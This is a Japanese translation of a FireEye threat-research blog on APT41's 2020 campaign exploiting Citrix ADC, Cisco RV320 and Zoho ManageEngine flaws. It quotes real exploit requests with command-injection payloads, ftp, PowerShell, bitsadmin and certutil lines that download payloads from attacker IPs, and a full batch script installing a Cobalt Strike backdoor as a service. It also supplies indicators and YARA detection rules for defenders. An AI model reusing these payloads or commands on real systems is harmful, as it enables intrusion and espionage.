ブログ(脅威調査)

APT41が複数のエクスプロイトを使用して世界中で侵入攻撃を開始

FireEyeは2020年初め、中国の攻撃グループAPT41が、近年観察された中国のサイバーエスピオナージ攻撃の攻撃グループによる最も広範なキャンペーン攻撃の1つを実施していることを観察しました。1月20日から3月11日までの間に、FireEyeは、APT41Citrix NetScaler/ADC、Ciscoルーター、Zoho ManageEngine Desktop Centralの脆弱性を悪用しようとしていることを、FireEyeのお客様75社以上で確認しました。対象となった国は、オーストラリア、カナダ、デンマーク、フィンランド、フランス、インド、イタリア、日本、マレーシア、メキシコ、フィリピン、ポーランド、カタール、サウジアラビア、シンガポール、スウェーデン、スイス、UAE、英国、米国です。標的には次の業界が含まれます:銀行・金融、建設、防衛産業基盤、政府、医療、ハイテク、高等教育、法務、製造、メディア、非営利、石油・ガス、化学、薬品、不動産、通信、運輸、旅行、公益サービス。APT41がインターネットをスキャンして、大規模な攻撃を試みたのか、特定の組織を標的としたのかは不明ですが、実際は標的が絞られていたように見えます。

CVE-2019-19781(Citrix Application Delivery Controller[ADC])の脆弱性の悪用

2020年1月20日以降、APT41はIPアドレス66.42.98[.]220を使用して、Citrix Application Delivery Controller(ADC)とCitrix Gatewayに対し、CVE-2019-19781(2019年12月17日発行)の脆弱性の悪用を試みました。


図1:主要イベントのタイムライン

最初のCVE-2019-19781の悪用は2020年1月20日と1月21日で、「file /bin/pwd」コマンドが実行され、APT41は2つの目標を達成した可能性があります。1つ目は、システムが脆弱であり、緩和策が適用されていないかどうかを確認しました。2つ目は、続いてAPT41がバックドアを展開するために必要となる、アーキテクチャ関連情報を返した可能性があります。

注目すべき点は、すべてのリクエストがCitrixのデバイスに対してのみ実行されており、インターネット上でアクセス可能な種別特定済みのデバイスのリストをもとに、APT41が活動していたことを示しています。

POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

図2:CVE-2019-19781を悪用したAPT41 HTTPトラフィックの例

1月23日から2月1日までの間、APT41の活動には一時的な休止があり、2020年1月24日から1月30日までの中国の春節の祝日に関連があると考えられます。これは、過去数年においても、中国のAPTグループの一般的な活動パターンでした。

2020年2月1日以降、APT41は、ファイル転送プロトコル(FTP)でダウンロードを行う、CVE-2019-19781悪用ペイロードを使うようになりました。具体的には、APT41は「/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd」というコマンドを実行しました。このコマンドはFTPプロトコルを介して66.42.98[.]220に接続し、「test」というユーザー名とパスワード(編集済み)を使用してFTPサーバーにログインし、「bsd」という名前の未知のペイロード(おそらくバックドア)をダウンロードしました。

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 147
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]

図3:CVE-2019-19781を悪用したAPT41 HTTPトラフィックの例

2020年2月2日から2月19日の間、FireEyeのお客様ではAPT41の活動は確認されませんでした。中国は、1月23日から1月24日にかけて、湖北省の都市でCOVID-19に関連する検疫を開始し、2月2日から2月10日にかけて、他の都市にも検疫を展開しました。活動の減少は、中国におけるCOVID-19検疫対策に関連している可能性がありますが、APT41はFireEyeテレメトリーでは確認できない、他の活動をしていたかもしれません。2月24日と2月25日では、CVE-2019-19781の悪用件数が大幅に増加しました。その内容は、ペイロード「un」の名称が変更された以外は、2月1日の活動とほぼ同じでした。

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 145
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

図4:CVE-2019-19781を悪用したAPT41 HTTPトラフィックの例

Citrixは2019年12月17日にCVE-2019-19781の緩和策を公開し、2020年1月24日時点では、Citrix ADC、Gateway、SD-WAN WANOPのサポートされているすべてのバージョンで修正をリリースしました。

Ciscoルーターの悪用

2020年2月21日、APT41は通信企業でCisco RV320ルーターの悪用に成功し、「fuc」(MD5:155e98e5ca8d662fad7dc84187340cbc)という名前の、64ビットMIPSプロセッサ用にコンパイルされた32ビットELFバイナリのペイロードをダウンロードしました。どのエクスプロイトが使用されたかは不明ですが、2つのCVE(CVE-2019-1653CVE-2019-1652)を組み合わせ、Cisco RV320とRV325の小規模ビジネス向けルーター上でリモートコード実行を可能にし、wgetを使用して指定のペイロードをダウンロードするMetasploitモジュールがあります。

GET /test/fuc
HTTP/1.1
Host: 66.42.98\.220
User-Agent: Wget
Connection: close

図5:HTTPリクエストの例(Cisco RV320ルーターがwget経由でペイロードをダウンロードしている)

66.42.98[.]220も、ファイル名http://66.42.98[.]220/test/1.txtをホストしていました。1.txt(MD5:c0c467c8e9b2046d7053642cc9bdd57d)の内容は「cat /etc/flash/etc/nk_sysconfig」です。これはCisco RV320ルーターで実行されるコマンドで、現在の設定を表示します。

Cisco PSIRTは、該当する脆弱性に対応する修正済みソフトウェアが公開され、以下のセキュリティアドバイザリを確認して適切な対応をするように顧客に依頼したことを確認しました。

CVE-2020-10189(Zoho ManageEngineゼロデイ脆弱性)の悪用

リサーチャーSteven Seeleyは2020年3月5日に、Zoho ManageEngine Desktop Centralの10.0.474より前のバージョンの、リモートコード実行可能なゼロデイ脆弱性(CVE-2020-10189)に関するアドバイザリを発表し、実証(PoC)コードを公開しました。FireEyeは3月8日以降、APT41が、FireEyeのお客様12社以上で、91.208.184[.]78 からZoho ManageEngineの脆弱性の悪用を試みていたことを確認しました。結果として、少なくとも5社のお客様が侵害されました。FireEyeは、ペイロード(install.batとstoresyncsvc.dll)の展開方法に、2つの異なるバリエーションがあること観察しました。最初のバリエーションでは、CVE-2020-10189エクスプロイトで単純なJavaベースのプログラム「logger.zip」を直接アップロードしました。これにはPowerShellを使用してinstall.batとstoresyncsvc.dllをダウンロードして実行する一連のコマンドを含んでいました。

java/lang/Runtime

getRuntime

()Ljava/lang/Runtime;

Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\
Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','
C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat

'(Ljava/lang/String;)Ljava/lang/Process;

StackMapTable

ysoserial/Pwner76328858520609

Lysoserial/Pwner76328858520609;

図6:logger.zipの内容

ここに、POCでペイロードを作成するために使用されたツールysoserialのツールマークを見ることができます。Pwner763288520609はPOCペイロードに固有の文字列であり、APT41がこのPOCをもとに攻撃ツールを作成した可能性が高いことを示しています。

2番目のバリエーションでは、FireEyeは、APT41がMicrosoft BITSAdminコマンドライン・ツールを使用して、既知のAPT41インフラ66.42.98[.]220(ポート12345)からinstall.bat(MD5:7966c2c546b71e800397a67f942858d0)をダウンロードしたことを観察しました。

Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe

Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat

図7:CVE-2020-10189の悪用が成功したことを示すFireEyeエンドポイント・セキュリティのイベントの例

どちらのバリエーションでも、install.batバッチファイルを使用して、持続性を保つために storesyncsvc.dll(MD5:5909983db4d9023e4098e56361c96a6f)という名前のCobalt Strike BEACONローダーの試用版をインストールしました。

@echo off

set "WORK_DIR=C:\Windows\System32"

set "DLL_NAME=storesyncsvc.dll"

set "SERVICE_NAME=StorSyncSvc"

set "DISPLAY_NAME=Storage Sync Service"

set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."

 sc stop %SERVICE_NAME%

sc delete %SERVICE_NAME%

mkdir %WORK_DIR%

copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f

sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"

SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000

sc description "%SERVICE_NAME%" "%DESCRIPTION%"

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f

net start "%SERVICE_NAME%"

図8:install.batの内容

Storesyncsvc.dllは、jquery malleableコマンドアンドコントロール(C2)プロファイルを使用してexchange.dumb1[.]com(74.82.201[.]8のDNS解決で)に接続するCobalt Strike BEACONインプラント(試用版)でした。

GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM
DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive Cache-Control: no-cache

図9:APT41 Cobalt Strike BEACON jquery malleable C2プロファイルHTTPリクエストの例

APT41は、最初の攻撃から数時間以内に、storescyncsvc.dll BEACONバックドアを使用して、別のC2アドレスとMicrosoft CertUtilを使用する、第2のバックドアをダウンロードしました。これはFireEyeがこれまでに観察した、APT41が多用するTTPです。続いて2.exe(MD5:3e856162c36b532925c8226b4ed3481c)がダウンロードされました。2.exeファイルは、Cobalt Strike BEACONシェルコードをダウンロードするために使用されるVMProtected Meterpreterダウンローダーです。VMProtectedバイナリは、よく見られる別のTTPで、ツールキットの他のツールの解析を遅らせるために、APT41が複数の侵入で利用していることを観察しています。

GET /2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.3
Host: 91.208.184[.]78

図10:CertUtilを使用した「2.exe」VMProtected MeterpreterダウンローダーをダウンロードするHTTPリクエストの例

certutil  -urlcache -split -f http://91.208.184[.]78/2.exe

図11:「2.exe」VMProtected MeterpreterダウンローダーをダウンロードするためのCertUtilコマンドの例

Meterpreterダウンローダー「TzGG」は、ポート443を介して91.208.184[.]78と通信するように設定されており、Cobalt Strike BEACON(試用版)のシェルコード(MD5:659bd19b562059f3f0cc978e15624fd9)をダウンロードします。

GET /TzGG HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Host: 91.208.184[.]78:443
Connection: Keep-Alive
Cache-Control: no-cache

図12:Cobalt Strike BEACONの「TzGG」シェルコードをダウンロードするHTTPリクエストの例

ダウンロードされたBEACONシェルコードが同じC2サーバー91.208.184[.]78に接続されました。FireEyeは、これは侵害されたシステムへの攻撃後のアクセスを多様化するための手法の一例であると考えています。

ManageEngineは2020年1月20日に、CVE-2020-10189の短期的な緩和策を公開し、その後、2020年3月7日に長期修正を含むアップデートをリリースしました。

展望

この活動は、近年、中国が関与する攻撃グループによる、FireEyeが観察した最も広範囲のキャンペーンのひとつです。APT41は、NetSarangソフトウェアをトロイの木馬化したような初期侵入を広範囲に利用して活動を行ってきましたが、このスキャニングと脆弱性の悪用は、FireEyeの一部のお客様に焦点を当てており、APT41の早い運用テンポと幅広い収集要件を明らかにしていると思われます。

注目すべきは、これらの攻撃は、Cobalt StrikeやMeterpreterのような一般公開されているマルウェアを利用していたことです。これらのバックドアはフル機能を備えていますが、以前のインシデントでは、APT41は、初期偵察を行い、彼らがどのような環境にいるのかを把握するまで高度なマルウェアを展開しませんでした。APT41は、2020年でも引き続き、FireEyeが現在追跡している最も活発な脅威の1つです。このグループの新しい活動は、新たに公開された脆弱性を自らの利益に活用するためにどれほど豊富なリソースがあり迅速に動けるかを示しています。

これまで、FireEye Mandiant Managed Defenseは、APT41が米国の大学に対してCVE-2019-3396(Atlassian Confluence)の活用に成功していることを確認しています。APT41は国家支援を受けてスパイ活動を行う中国の脅威グループですが、金銭的利益のための活動も行います。

インジケーター

Type

Indicator(s)

CVE-2019-19781 Exploitation (Citrix Application Delivery Control)

66.42.98[.]220

CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’

CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’

CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’

/tmp/bsd

/tmp/un

Cisco Router Exploitation

66.42.98\.220

‘1.txt’ (MD5:  c0c467c8e9b2046d7053642cc9bdd57d)

‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc

CVE-2020-10189 (Zoho ManageEngine Desktop Central)

66.42.98[.]220

91.208.184[.]78

74.82.201[.]8

exchange.dumb1[.]com

install.bat (MD5: 7966c2c546b71e800397a67f942858d0)

storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)

C:\Windows\Temp\storesyncsvc.dll

C:\Windows\Temp\install.bat

2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)

C:\Users\[redacted]\install.bat

TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)

C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe

Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78

PowerShell downloading files with Net.WebClient

手法の検出

FireEyeは、プラットフォーム全体でこの活動を検出します。以下の表には、この活動の発生前に公開されていた膨大な検知リストから、該当する検知名をいくつかあげています

Platform

Signature Name

Endpoint Security

 

BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)

CERTUTIL.EXE DOWNLOADER A (UTILITY)

Generic.mg.5909983db4d9023e

Generic.mg.3e856162c36b5329

POWERSHELL DOWNLOADER (METHODOLOGY)

SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)

Network Security

Backdoor.Meterpreter

DTI.Callback

Exploit.CitrixNetScaler

Trojan.METASTAGE

Exploit.ZohoManageEngine.CVE-2020-10198.Pwner

Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader

Helix

CITRIX ADC [Suspicious Commands]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]
 EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]
 MALWARE METHODOLOGY [Certutil User-Agent]
 WINDOWS METHODOLOGY [BITSadmin Transfer]
 WINDOWS METHODOLOGY [Certutil Downloader]

MITRE ATT&CKマッピング

ATT&CK

Techniques

Initial Access

External Remote Services (T1133), Exploit Public-Facing Application (T1190)

Execution

PowerShell (T1086), Scripting (T1064)

Persistence

New Service (T1050)

 

Privilege Escalation

Exploitation for Privilege Escalation (T1068)

 

Defense Evasion

BITS Jobs (T1197), Process Injection (T1055)

 

 

Command And Control

Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)

付録A:検出ルール

以下のYaraルールは、APT41攻撃者のTTPの検知ルールの例として、検知またはハンティングに活用できます。すべての検知ルールは、本番システムに導入する前に、慎重なテストとチューニングを行うことをお勧めします。これらのルールのいくつかは高精度な検知に役立つ簡潔な結果を出しますが、他のルールは合致条件が緩く、追加の処理が必要な場合があります。

import "pe"

rule ExportEngine_APT41_Loader_String

{

            meta:

                        author = "@stvemillertime"

                        description "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"

            strings:

                        $pcre = /loader_[\x00-\x7F]{1,}\x00/

            condition:

                        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_ShortName

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a single character"

    strings:

        $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_xArch

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a something like x32.dat"

            strings:

             $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/

            condition:

             uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule RareEquities_LibTomCrypt

{

    meta:

        author = "@stvemillertime"

        description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."

    strings:

        $a1 = "LibTomMath"

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1

}

rule RareEquities_KCP

{

    meta:

        author = "@stvemillertime"

        description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."

    strings:

        $a01 = "[RO] %ld bytes"

        $a02 = "recv sn=%lu"

        $a03 = "[RI] %d bytes"

        $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"

        $a05 = "input psh: sn=%lu ts=%lu"

        $a06 = "input probe"

        $a07 = "input wins: %lu"

        $a08 = "rcv_nxt=%lu\\n"

        $a09 = "snd(buf=%d, queue=%d)\\n"

        $a10 = "rcv(buf=%d, queue=%d)\\n"

        $a11 = "rcvbuf"

    condition:

        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)

}

rule ConventionEngine_Term_Users

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Term_Desktop

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Anomaly_MultiPDB_Double

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2

}

 

本ブログは、米FireEyeが公開した March 25, 2020「This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits」(英語)の日本語抄訳版です。

日本語版:Reviewed by Takahiro Sajima